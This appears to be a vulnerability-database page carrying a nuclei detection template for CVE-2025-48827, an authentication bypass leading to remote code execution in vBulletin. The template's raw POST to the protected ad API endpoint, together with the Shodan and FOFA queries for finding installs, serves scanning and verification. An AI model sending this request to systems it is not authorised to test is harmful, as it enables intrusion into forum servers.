Lucene search
+L

vBulletin 5.0.0-6.0.3 - Authentication Bypass

🗓️ 31 Aug 2026 05:18:17Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 40 Views

vBulletin 5.0.0-6.0.3 allows authentication bypass, leading to full system compromise by attackers.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for Improper Protection of Alternate Path in Vbulletin
31 May 202515:23
githubexploit
githubexploit
GithubExploit
Exploit for Improper Protection of Alternate Path in Vbulletin
14 Jul 202502:17
githubexploit
bdu_fstec
BDU FSTEC
The vulnerability of the commercial vBulletin web forum, related to improper protection of the alternative path, allows a hacker to execute arbitrary code.
16 Jun 202500:00
bdu_fstec
circl
Circl
CVE-2025-48827
27 May 202504:47
circl
cnnvd
CNNVD
Internet Brands vBulletin 安全漏洞
27 May 202500:00
cnnvd
cve
CVE
CVE-2025-48827
27 May 202500:00
cve
cvelist
Cvelist
CVE-2025-48827
27 May 202500:00
cvelist
euvd
EUVD
EUVD-2025-28267
27 May 202500:00
euvd
kitploit
Kitploit
CVE-2025-48827
1 Sep 202618:38
kitploit
kitploit
Kitploit
CVE-2025-48827
1 Sep 202622:46
kitploit
Rows per page
id: CVE-2025-48827

info:
  name: vBulletin 5.0.0-6.0.3 - Authentication Bypass
  author: pszyszkowski
  severity: critical
  description: |
    vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass caused by unauthenticated access to protected API controllers on PHP 8.1 or later, letting unauthenticated attackers invoke protected methods remotely.Starting from PHP 8.1, due to an internal adjustment to handling of ReflectionMethod::invoke() and similar methods, it now allows — by default — invocation of protected / private methods when using PHP's Reflection API.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
  remediation: |
    Upgrade to vBulletin 6.0.4+ before upgrading to PHP 8.1.
  reference:
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
  classification:
    epss-score: 0.75844
    epss-percentile: 0.99487
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-48827
    cwe-id: CWE-424
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    fofa-query: app="vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: cve,cve2025,rce,vbulletin,intrusive,vkev,vuln

variables:
  rand_string: "{{to_lower(rand_base(5))}}"
  rand_value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /ajax/api/ad/wrapAdTemplate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        template={{rand_string}}&id_name={{rand_value}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
          - contains_all(body,'<div class=','ad_{{rand_value}}_inner','{{rand_string}}')
        condition: and
# digest: 4a0a0047304502205d72850e01b7b1c2396fee4d2e3711b8c10826f624486a78eaa7b417a554a849022100b4e745c92cf97564be9cda704341be0b2ab8339e395aa6411e27266c7df111c3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8 - 10
EPSS0.75844
SSVC
40